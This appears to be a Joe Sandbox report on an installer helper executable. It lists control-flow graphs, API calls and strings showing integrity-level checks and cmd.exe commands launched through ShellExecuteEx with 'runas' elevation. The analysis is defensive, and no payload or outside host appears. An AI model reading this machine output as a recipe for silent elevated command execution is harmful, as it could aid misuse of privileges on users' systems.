33582->33578 33719 fb4ac0 42 API calls 3 library calls 33582->33719 33583 fb6d24 33583->33548 33721 fb46f0 52 API calls 33583->33721 33587 fb6f10 33668 fb52f0 33587->33668 33589 fb6d70 33723 fb4ba0 179 API calls 3 library calls 33589->33723 33590 fb6ee6 33590->33587 33726 fb4ac0 42 API calls 3 library calls 33590->33726 33592 fb6d4e 33722 fb4ac0 42 API calls 3 library calls 33592->33722 33594 fb6d46 33594->33589 33594->33592 33594->33594 33595 fb6d8a 33595->33548 33597->33428 33598->33436 33599->33430 33601 fd293f 33600->33601 33602 fd2940 IsProcessorFeaturePresent 33600->33602 33601->33512 33604 fd29a5 33602->33604 33607 fd2968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33604->33607 33606 fd2a88 33606->33512 33607->33606 33608->33518 33728 fb5e40 GetTokenInformation 33609->33728 33613 fb5fac 33612->33613 33614 fb5fd2 33612->33614 33616 fb24c0 47 API calls 33613->33616 33615 fb24c0 47 API calls 33614->33615 33619 fb5fc9 33615->33619 33616->33619 33617 fb6003 33620 fb24c0 33617->33620 33618 fb5ff5 LocalFree 33618->33617 33619->33617 33619->33618 33624 fb24fd 33620->33624 33626 fb24d1 codecvt 33620->33626 33621 fb25f5 33739 fb2770 42 API calls 33621->33739 33623 fb2515 33627 fb25f0 33623->33627 33628 fb2566 LocalAlloc 33623->33628 33624->33621 33624->33623 33624->33627 33630 fb2582 33624->33630 33625 fb25fa 33740 fd7027 41 API calls 2 library calls 33625->33740 33626->33555 33738 fb2d70 RaiseException _com_raise_error 33627->33738 33628->33625 33632 fb2577 33628->33632 33634 fb2586 LocalAlloc 33630->33634 33639 fb2593 codecvt 33630->33639 33632->33639 33634->33639 33639->33625 33640 fb25e5 33639->33640 33641 fb25d8 33639->33641 33640->33555 33641->33640 33642 fb25de LocalFree 33641->33642 33642->33640 33644 fb2e8d 33643->33644 33645 fb2eb7 33643->33645 33644->33643 33646 fb2eaa 33644->33646 33741 fd7027 41 API calls 2 library calls 33644->33741 33645->33558 33646->33645 33647 fb2eb0 LocalFree 33646->33647 33647->33645 33650 fb179b 33649->33650 33651 fb17c1 33649->33651 33652 fb17ba LocalFree 33650->33652 33653 fb17e5 33650->33653 33654 fb17b4 33650->33654 33651->33529 33651->33571 33652->33651 33742 fd7027 41 API calls 2 library calls 33653->33742 33654->33651 33654->33652 33658 fb57e1 33657->33658 33659 fb57e7 GetTokenInformation 33657->33659 33658->33538 33660 fb581e CloseHandle 33659->33660 33661 fb5816 33659->33661 33660->33538 33661->33660 33662->33545 33663->33562 33664->33565 33665->33579 33666->33577 33667->33590 33669 fb5361 33668->33669 33743 fb5d30 33669->33743 33671 fb537b 33672 fb5d30 41 API calls 33671->33672 33673 fb538b 33672->33673 33747 fb59c0 33673->33747 33675 fb57b0 33766 fb11d0 RaiseException _com_raise_error 33675->33766 33678 fb539b 33678->33675 33755 fd7852 33678->33755 33681 fb53e1 33682 fb5d30 41 API calls 33681->33682 33683 fb53f5 33682->33683 33688 fb5493 GetWindowsDirectoryW 33683->33688 33700 fb54cc 33683->33700 33684 fb551d GetForegroundWindow 33713 fb5529 33684->33713 33685 fb55f7 ShellExecuteExW 33686 fb5609 33685->33686 33687 fb5612 33685->33687 33764 fb5890 6 API calls 33686->33764 33690 fb5646 33687->33690 33692 fb5625 ShellExecuteExW 33687->33692 33762 fb5b10 70 API calls 33688->33762 33697 fb56fa 33690->33697 33698 fb566c GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 33690->33698 33692->33690 33693 fb563d 33692->33693 33765 fb5890 6 API calls 33693->33765 33694 fb54b4 33763 fb5b10 70 API calls 33694->33763 33699 fb5721 33697->33699 33702 fb570e WaitForSingleObject GetExitCodeProcess 33697->33702 33698->33697 33701 fb5698 33698->33701 33758 fb5940 33699->33758 33700->33684 33700->33713 33701->33697 33704 fb56a1 GetModuleHandleW GetProcAddress 33701->33704 33702->33699 33704->33697 33705 fb56b4 GetProcessId 33704->33705 33706 fb56c3 33705->33706 33707 fb56c8 Sleep EnumWindows 33706->33707 33708 fb56ed 33706->33708 33707->33706 33707->33708 33836 fb5830 GetWindowThreadProcessId 33707->33836 33708->33697 33710 fb56f3 BringWindowToTop 33708->33710 33710->33697 33711 fd2937 __ehhandler$___std_fs_get_file_id@8 5 API calls 33712 fb57a8 33711->33712 33712->33548 33713->33685 33714->33550 33715->33570 33716->33563 33717->33569 33718->33582 33719->33578 33720->33583 33721->33594 33722->33589 33723->33595 33724->33559 33725->33575 33726->33587 33729 fb5ebe GetLastError 33728->33729 33730 fb5e18 33728->33730 33729->33730 33731 fb5ec9 33729->33731 33730->33534 33730->33535 33732 fb5f0e GetTokenInformation 33731->33732 33733 fb5ee9 33731->33733 33736 fb5ed9 _Getvals 33731->33736 33732->33730 33737 fb60d0 45 API calls 3 library calls 33733->33737 33735 fb5ef2 33735->33732 33736->33732 33737->33735 33744 fb5d6e 33743->33744 33746 fb5d7d 33744->33746 33767 fb4a10 41 API calls 4 library calls 33744->33767 33746->33671 33748 fb59f8 33747->33748 33749 fb5a03 33747->33749 33750 fb5d30 41 API calls 33748->33750 33754 fb5a1a 33749->33754 33768 fb2310 56 API calls 33749->33768 33751 fb5a01 33750->33751 33751->33678 33769 fb5a60 42 API calls 33754->33769 33770 fd7869 33755->33770 33759 fb572d 33758->33759 33760 fb5971 33758->33760 33759->33711 33760->33759 33761 fb5981 CloseHandle 33760->33761 33761->33759 33762->33694 33763->33700 33764->33687 33765->33690 33767->33746 33768->33754 33769->33751 33775 fd7078 33770->33775 33776 fd708f 33775->33776 33777 fd7096 33775->33777 33783 fd76d9 33776->33783 33777->33776 33820 fe57cc 41 API calls 3 library calls 33777->33820 33779 fd70b7 33821 fe5ab7 41 API calls __Getctype 33779->33821 33781 fd70cd 33822 fe5b15 41 API calls __cftoe 33781->33822 33784 fd7709 ___crtCompareStringW 33783->33784 33785 fd76f3 33783->33785 33784->33785 33788 fd7720 33784->33788 33823 fd7370 14 API calls __dosmaperr 33785->33823 33787 fd76f8 33824 fd7017 41 API calls collate 33787->33824 33790 fd7702 33788->33790 33825 fe5c2a 6 API calls 2 library calls 33788->33825 33795 fd2937 __ehhandler$___std_fs_get_file_id@8 5 API calls 33790->33795 33792 fd776e 33793 fd778f 33792->33793 33794 fd7778 33792->33794 33797 fd77a5 33793->33797 33798 fd7794 33793->33798 33826 fd7370 14 API calls __dosmaperr 33794->33826 33799 fb53d3 33795->33799 33802 fd7826 33797->33802 33804 fd77cc 33797->33804 33810 fd77b9 __alloca_probe_16 33797->33810 33828 fd7370 14 API calls __dosmaperr 33798->33828 33799->33675 33799->33681 33800 fd777d 33827 fd7370 14 API calls __dosmaperr 33800->33827 33833 fd7370 14 API calls __dosmaperr 33802->33833 33829 fe5bdc 15 API calls 2 library calls 33804->33829 33806 fd782b 33834 fd7370 14 API calls __dosmaperr 33806->33834 33809 fd77d2 33809->33802 33809->33810 33810->33802 33812 fd77e6 33810->33812 33830 fe5c2a 6 API calls 2 library calls 33812->33830 33814 fd7802 33815 fd7809 33814->33815 33816 fd781a 33814->33816 33831 fdb762 41 API calls 2 library calls 33815->33831 33832 fd7370 14 API calls __dosmaperr 33816->33832 33819 fd7813 33835 fd2326 14 API calls std::_Locinfo::_W_Getdays 33819->33835 33820->33779 33821->33781 33822->33776 33823->33787 33824->33790 33825->33792 33826->33800 33827->33790 33828->33787 33829->33809 33830->33814 33831->33819 33832->33819 33833->33806 33834->33819 33835->33790 33837 fb584e GetWindowLongW 33836->33837 33838 fb5881 33836->33838

                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                      Function 00FB52F0 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 402libraryloadersleepCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 0 fb52f0-fb53a8 call fb63a0 call fb5d30 * 2 call fb59c0 9 fb53ae-fb53bd 0->9 10 fb57b0-fb57ba call fb11d0 0->10 12 fb53c9-fb53db call fd7852 9->12 13 fb53bf-fb53c7 call fb49a0 9->13 12->10 19 fb53e1-fb540a call fb5d30 12->19 13->12 22 fb540c-fb540f 19->22 23 fb5414-fb5419 19->23 22->23 24 fb54cf-fb551b 23->24 25 fb541f-fb5429 23->25 27 fb5529-fb552b 24->27 28 fb551d-fb5526 GetForegroundWindow 24->28 26 fb5430-fb5436 25->26 29 fb5438-fb543b 26->29 30 fb5456-fb5458 26->30 31 fb5531-fb5535 27->31 32 fb55f7-fb5607 ShellExecuteExW 27->32 28->27 33 fb543d-fb5445 29->33 34 fb5452-fb5454 29->34 35 fb545b-fb545d 30->35 36 fb5540-fb554c 31->36 37 fb5537-fb553e 31->37 38 fb5609-fb5612 call fb5890 32->38 39 fb5614-fb5616 32->39 33->30 40 fb5447-fb5450 33->40 34->35 41 fb545f 35->41 42 fb5493-fb54cc GetWindowsDirectoryW call fb5b10 * 2 35->42 43 fb5550-fb555d 36->43 37->36 37->37 38->39 45 fb5618-fb561e 39->45 46 fb5646-fb5666 call fb5b30 39->46 40->26 40->34 49 fb5464-fb546a 41->49 42->24 43->43 50 fb555f-fb556b 43->50 52 fb5620-fb5623 45->52 53 fb5625-fb563b ShellExecuteExW 45->53 62 fb56fd-fb5702 46->62 63 fb566c-fb5696 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 46->63 57 fb548a-fb548c 49->57 58 fb546c-fb546f 49->58 59 fb5570-fb557d 50->59 52->46 52->53 53->46 54 fb563d-fb5641 call fb5890 53->54 54->46 67 fb548f-fb5491 57->67 64 fb5471-fb5479 58->64 65 fb5486-fb5488 58->65 59->59 66 fb557f-fb55f5 call fb64a0 * 5 59->66 68 fb5721-fb5728 call fb5940 62->68 69 fb5704-fb570c 62->69 63->62 71 fb5698-fb569f 63->71 64->57 72 fb547b-fb5484 64->72 65->67 66->32 67->24 67->42 79 fb572d-fb5744 68->79 69->68 75 fb570e-fb571b WaitForSingleObject GetExitCodeProcess 69->75 71->62 77 fb56a1-fb56b2 GetModuleHandleW GetProcAddress 71->77 72->49 72->65 75->68 80 fb56fa 77->80 81 fb56b4-fb56c1 GetProcessId 77->81 83 fb574e-fb5762 79->83 84 fb5746-fb5749 79->84 80->62 85 fb56c3-fb56c6 81->85 87 fb576c-fb5781 83->87 88 fb5764-fb5767 83->88 84->83 89 fb56c8-fb56eb Sleep EnumWindows 85->89 90 fb56ef-fb56f1 85->90 92 fb578b-fb57af call fd2937 87->92 93 fb5783-fb5786 87->93 88->87 89->85 94 fb56ed 89->94 90->80 95 fb56f3-fb56f4 BringWindowToTop 90->95 93->92 94->95 95->80
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00FB549C
                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00FB551D
                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00FB5601
                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00FB5637
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00FB567C
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FB5685
                                                                                                                                                                                                                                                                      • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00FB5688
                                                                                                                                                                                                                                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 00FB568B
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00FB56AB
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FB56AE
                                                                                                                                                                                                                                                                      • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00FB56B5
                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000064,?,?,?,?,?,?), ref: 00FB56CA
                                                                                                                                                                                                                                                                      • EnumWindows.USER32(00FB5830,?), ref: 00FB56DF
                                                                                                                                                                                                                                                                      • BringWindowToTop.USER32(00000000), ref: 00FB56F4
                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00FB5711
                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00FB571B
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ProcessWindow$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                                                                                                                                                                                                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                                                                                                                      • API String ID: 2597324065-2796270252
                                                                                                                                                                                                                                                                      • Opcode ID: cda49db79cba8c1f82f57c3ff29bf32860cf88d2dd7006b15e5234dcf2389d7c
                                                                                                                                                                                                                                                                      • Instruction ID: 957c1972df42d45f40e05ebd988f8449ab3630a35526a2a8fb4e71b3444072fd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cda49db79cba8c1f82f57c3ff29bf32860cf88d2dd7006b15e5234dcf2389d7c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9E1BF71E00A09DBDF11DFA9CC84BEEB7B5AF48B20F544169E815AB291EB389D01DF50
                                                                                                                                                                                                                                                                      Function 00FB6A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 102 fb6a50-fb6a82 103 fb6aa3-fb6add GetCurrentProcess OpenProcessToken 102->103 104 fb6a84-fb6aa2 call fd2937 102->104 108 fb6b09-fb6b1e call fb5de0 103->108 109 fb6adf-fb6af2 103->109 116 fb6b2e-fb6b30 108->116 117 fb6b20-fb6b2c call fb1770 108->117 110 fb6b02-fb6b04 109->110 111 fb6af4-fb6afb CloseHandle 109->111 113 fb6c24-fb6c2b call fb57c0 110->113 111->110 125 fb6ddb-fb6e06 call fb2310 113->125 126 fb6c31-fb6c35 113->126 118 fb6b3f-fb6ba5 call fb5f40 call fb24c0 116->118 119 fb6b32-fb6b3d call fb1770 116->119 117->109 140 fb6bdb 118->140 141 fb6ba7-fb6ba9 118->141 119->109 134 fb6e0c-fb6e2b call fb46f0 125->134 135 fb6f96-fb6fa0 call fb11d0 125->135 126->125 130 fb6c3b-fb6c3d 126->130 130->125 133 fb6c43-fb6c59 call fb2310 130->133 133->135 142 fb6c5f-fb6c7e call fb46f0 133->142 157 fb6e59-fb6e6a call fb2310 134->157 158 fb6e2d-fb6e2f 134->158 143 fb6bdd-fb6c14 call fb2e60 * 2 call fb1770 140->143 146 fb6c88-fb6c8a 141->146 147 fb6baf-fb6bb8 141->147 167 fb6cad-fb6cc9 call fb2310 142->167 168 fb6c80-fb6c82 142->168 143->113 181 fb6c16-fb6c1d CloseHandle 143->181 146->143 147->140 150 fb6bba-fb6bbc 147->150 154 fb6bbf 150->154 154->140 159 fb6bc1-fb6bc4 154->159 157->135 177 fb6e70-fb6e8c call fb46f0 157->177 163 fb6e31-fb6e33 158->163 164 fb6e35-fb6e3a 158->164 159->146 165 fb6bca-fb6bd9 159->165 171 fb6e4f-fb6e54 call fb4ac0 163->171 166 fb6e40-fb6e49 164->166 165->140 165->154 166->166 172 fb6e4b-fb6e4d 166->172 167->135 183 fb6ccf-fb6ceb call fb46f0 167->183 174 fb6c8f-fb6c91 168->174 175 fb6c84-fb6c86 168->175 171->157 172->171 182 fb6c94-fb6c9d 174->182 180 fb6ca3-fb6ca8 call fb4ac0 175->180 191 fb6eb9-fb6ec6 call fb2310 177->191 192 fb6e8e-fb6e90 177->192 180->167 181->113 182->182 185 fb6c9f-fb6ca1 182->185 198 fb6d19-fb6d26 call fb2310 183->198 199 fb6ced-fb6cef 183->199 185->180 191->135 204 fb6ecc-fb6ee8 call fb46f0 191->204 195 fb6e92-fb6e94 192->195 196 fb6e96-fb6e9b 192->196 200 fb6eaf-fb6eb4 call fb4ac0 195->200 201 fb6ea0-fb6ea9 196->201 198->135 211 fb6d2c-fb6d48 call fb46f0 198->211 205 fb6cf1-fb6cf3 199->205 206 fb6cf5-fb6cfa 199->206 200->191 201->201 202 fb6eab-fb6ead 201->202 202->200 219 fb6eea-fb6eec 204->219 220 fb6f10-fb6f28 call fb52f0 204->220 208 fb6d0f-fb6d14 call fb4ac0 205->208 209 fb6d00-fb6d09 206->209 208->198 209->209 213 fb6d0b-fb6d0d 209->213 226 fb6d4a-fb6d4c 211->226 227 fb6d70-fb6da4 call fb4ba0 211->227 213->208 223 fb6eee-fb6ef0 219->223 224 fb6ef2-fb6ef4 219->224 225 fb6f2d-fb6f47 220->225 228 fb6f06-fb6f0b call fb4ac0 223->228 229 fb6ef7-fb6f00 224->229 231 fb6f49-fb6f4c 225->231 232 fb6f51-fb6f65 225->232 233 fb6d4e-fb6d50 226->233 234 fb6d52-fb6d54 226->234 245 fb6dae-fb6dc2 227->245 246 fb6da6-fb6da9 227->246 228->220 229->229 236 fb6f02-fb6f04 229->236 231->232 238 fb6f6f-fb6f76 232->238 239 fb6f67-fb6f6a 232->239 237 fb6d66-fb6d6b call fb4ac0 233->237 240 fb6d57-fb6d60 234->240 236->228 237->227 244 fb6f79-fb6f84 238->244 239->238 240->240 242 fb6d62-fb6d64 240->242 242->237 249 fb6f8e 244->249 250 fb6f86-fb6f89 244->250 247 fb6dcc-fb6dd6 245->247 248 fb6dc4-fb6dc7 245->248 246->245 247->244 248->247 249->135 250->249
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00FB6AC8
                                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00FB6AD5
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FB6AF5
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                                                                                                                                      • String ID: S-1-5-18
                                                                                                                                                                                                                                                                      • API String ID: 4052875653-4289277601
                                                                                                                                                                                                                                                                      • Opcode ID: 1e8967156899e0a120001eb1a978a2a4ecf26f475d125c303611cf6a16bf0850
                                                                                                                                                                                                                                                                      • Instruction ID: ae589e6d422e6fd222d890d196fd3aa69348062a0bee71071906948f878236d5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e8967156899e0a120001eb1a978a2a4ecf26f475d125c303611cf6a16bf0850
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C02AF71D002498FDF14DFA5C9557EEBBB5EF45314F188258D802AB286EB38AE05EF90
                                                                                                                                                                                                                                                                      Function 00FB57C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 251 fb57c0-fb57df GetCurrentProcess OpenProcessToken 252 fb57e1-fb57e6 251->252 253 fb57e7-fb5814 GetTokenInformation 251->253 254 fb581e-fb582e CloseHandle 253->254 255 fb5816-fb581b 253->255 255->254
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,8F6E4A30,?,-00000010), ref: 00FB57D0
                                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00FB57D7
                                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00FB580C
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB5822
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 215268677-0
                                                                                                                                                                                                                                                                      • Opcode ID: 4092c2c46ca6baf0c5726c8af3a2d1651991d43ab71729d790707bf4c99c1184
                                                                                                                                                                                                                                                                      • Instruction ID: 1627eaff492f562f6e7f586aef6bf4a7e2da0428721093e4b4809ee20619bda7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4092c2c46ca6baf0c5726c8af3a2d1651991d43ab71729d790707bf4c99c1184
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4F01274148305ABEB10AF10EC45BAABBECFF44700F508819F984C21A0D779951CEB67
                                                                                                                                                                                                                                                                      Function 00FBCDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(8F6E4A30,?,?,?,?,?,?,?,?,?,00FF56D5,000000FF), ref: 00FBCDE8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00FB4251,8F6E4A30,00000000,?,00000000,?,?,?,00FF4400,000000FF,?), ref: 00FB1F9D
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00FBCEB1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00FB667E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                                                                                                                      • String ID: Full command line:
                                                                                                                                                                                                                                                                      • API String ID: 1878577176-831861440
                                                                                                                                                                                                                                                                      • Opcode ID: b6123362dc3cfe18e4de9b23d50709032c6fed80fdfb2eea7856cab8f780039d
                                                                                                                                                                                                                                                                      • Instruction ID: b01c99aca30f8cf3f86cdbe437e9866b4f48d6b10e92835e984adf40b314e5bc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6123362dc3cfe18e4de9b23d50709032c6fed80fdfb2eea7856cab8f780039d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE21BF71910214EBCB15FB61CC55BEF73A5AF44750F144118F406AB292EF3CAA08EBE1
                                                                                                                                                                                                                                                                      Function 00FB5E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 288 fb5e40-fb5ebc GetTokenInformation 289 fb5ebe-fb5ec7 GetLastError 288->289 290 fb5f20-fb5f33 288->290 289->290 291 fb5ec9-fb5ed7 289->291 292 fb5ed9-fb5edc 291->292 293 fb5ede 291->293 294 fb5f0b 292->294 295 fb5f0e-fb5f1a GetTokenInformation 293->295 296 fb5ee0-fb5ee7 293->296 294->295 295->290 297 fb5ee9-fb5ef5 call fb60d0 296->297 298 fb5ef7-fb5f08 call fd4080 296->298 297->295 298->294
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00FB5E18,8F6E4A30,?), ref: 00FB5EB4
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00FB5E18,8F6E4A30,?), ref: 00FB5EBE
                                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00FB5E18,8F6E4A30,?), ref: 00FB5F1A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2567405617-0
                                                                                                                                                                                                                                                                      • Opcode ID: cc9c102c4ddbcecdad391a2c5cf84a9ff42c24bdea911e02a9ee3e9983cff901
